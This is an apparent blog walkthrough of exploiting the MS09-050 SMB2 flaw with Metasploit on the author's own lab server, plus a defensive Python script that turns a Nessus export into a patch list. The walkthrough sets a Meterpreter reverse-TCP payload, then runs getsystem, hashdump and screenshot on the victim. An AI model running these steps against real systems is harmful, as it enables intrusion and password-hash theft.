I found this little vulnerability while running a Nessus scan and wanted to see what I could do with it. As you see in the screenshot, it is a critical vulnerability, MS09-050.
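The Nessus finding is where this walkthrough starts, so here is the defender's counterpart as an added example (my own code, not from the original post): it parses a .nessus v2 export and turns the critical findings into a per-host patching worklist, which is what you want to hand to whoever owns the box instead of a screenshot. The XML is a constructed sample; the plugin IDs, plugin titles, addresses and solution text are placeholders, not values taken from the post or from Nessus.

```python
"""Triage a Nessus (.nessus v2) export: list the critical findings per host
so they can be patched before someone else finds them with msfconsole."""
import xml.etree.ElementTree as ET
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Nessus 'severity' attribute on ReportItem: 0=Info, 1=Low, 2=Medium, 3=High, 4=Critical
SEVERITY_NAMES = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}

# Constructed sample export. Plugin IDs, titles and hosts are placeholders.
SAMPLE_NESSUS = """<NessusClientData_v2>
  <Report name="lab-scan">
    <ReportHost name="192.0.2.10">
      <HostProperties>
        <tag name="operating-system">Microsoft Windows Server 2008</tag>
      </HostProperties>
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4"
                  pluginID="PLACEHOLDER-1"
                  pluginName="MS09-050: SMB2 remote code execution (placeholder title)"
                  pluginFamily="Windows : Microsoft Bulletins">
        <risk_factor>Critical</risk_factor>
        <solution>Apply the vendor patch for MS09-050 (placeholder text).</solution>
      </ReportItem>
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="0"
                  pluginID="PLACEHOLDER-2" pluginName="SMB Service Detection"
                  pluginFamily="Service detection">
        <risk_factor>None</risk_factor>
      </ReportItem>
    </ReportHost>
    <ReportHost name="192.0.2.11">
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="2"
                  pluginID="PLACEHOLDER-3" pluginName="SMB Signing not required"
                  pluginFamily="Misc.">
        <risk_factor>Medium</risk_factor>
        <solution>Enforce message signing (placeholder text).</solution>
      </ReportItem>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""


@dataclass
class Finding:
    host: str
    port: int
    protocol: str
    severity: int
    plugin_id: str
    plugin_name: str
    risk_factor: str
    solution: str


def parse_findings(xml_text: str) -> List[Finding]:
    """Walk every ReportHost/ReportItem pair in a .nessus v2 document."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("ReportHost"):
        for item in host.iter("ReportItem"):
            findings.append(Finding(
                host=host.get("name", ""),
                port=int(item.get("port", "0")),
                protocol=item.get("protocol", ""),
                severity=int(item.get("severity", "0")),
                plugin_id=item.get("pluginID", ""),
                plugin_name=item.get("pluginName", ""),
                risk_factor=(item.findtext("risk_factor") or "").strip(),
                solution=(item.findtext("solution") or "").strip(),
            ))
    return findings


def filter_by_severity(findings: List[Finding], min_severity: int = 4) -> List[Finding]:
    """Keep findings at or above the given Nessus severity (default: Critical only)."""
    return [f for f in findings if f.severity >= min_severity]


def patch_worklist(findings: List[Finding], min_severity: int = 4) -> Dict[str, List[Tuple[str, str]]]:
    """Map host -> sorted (plugin title, solution) pairs that need action."""
    work = defaultdict(list)
    for f in filter_by_severity(findings, min_severity):
        work[f.host].append((f.plugin_name, f.solution))
    return {host: sorted(items) for host, items in work.items()}


if __name__ == "__main__":
    for host, items in patch_worklist(parse_findings(SAMPLE_NESSUS)).items():
        print(host)
        for title, fix in items:
            print(f"  {title}\n    -> {fix}")
```

Lower min_severity to 3 to pull High findings into the same list; the sample only has one host that qualifies at Critical, which is exactly the host this post goes on to exploit.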
So I started Metasploit by going to /opt/metasploit/apps/pro/msf3 (cd /opt/metasploit/apps/pro/msf3) as root.
Then type “search ms09-050” at the prompt, as shown in the screenshot.
As you see in the screenshot above, where the arrow is pointing it says “good”, which is the module's reliability rank. Cool, right!
Now type “use” as shown, then just copy and paste that exploit path after it.
Then you are going to want to see the available options, so type “show options”.
Set the IP of the host that you want to exploit, as shown above.
Now you want to see what payloads are available. There is a long list of payloads. From what I hear, the best one is windows/meterpreter/reverse_tcp.
Type that command in as shown below, then “show options” to see what options you may have to set; as you see here, we can set a listening host. Set your own IP, and soon the fun begins.
Now just type “exploit”, then “help” or “?” to see a list of all the fun things you can do with this system.
As you can see below, my two favorite commands are “getsystem” and “hashdump”:
getsystem elevates the session to SYSTEM-level privileges.
hashdump dumps the password hashes, so you can see who the users of the system are and get their password hashes.
Got the system.
Dumped the hashes (note the users).
idletime is a fun command to see how long the system has been idle,
and screenshot is fun to see what is going on on the screen.
Notice where the screenshot has been saved. I will show you how to view it.
In the top right of your Kali Linux desktop you see Applications and Places.
Click on Places, then File System.
Then follow the path: click the usr folder,
then the share folder,
then click the metasploit-framework folder.
Then look for the file name that the system gave it.
And bada boom, bada bing, here is the desktop of this unsuspecting user. (Actually, it was my own little server that I had running for the purpose of this demonstration.)
This stuff is tons of fun to learn, and it is even better to know how to defend against an attack like this one, which can wipe out an entire network.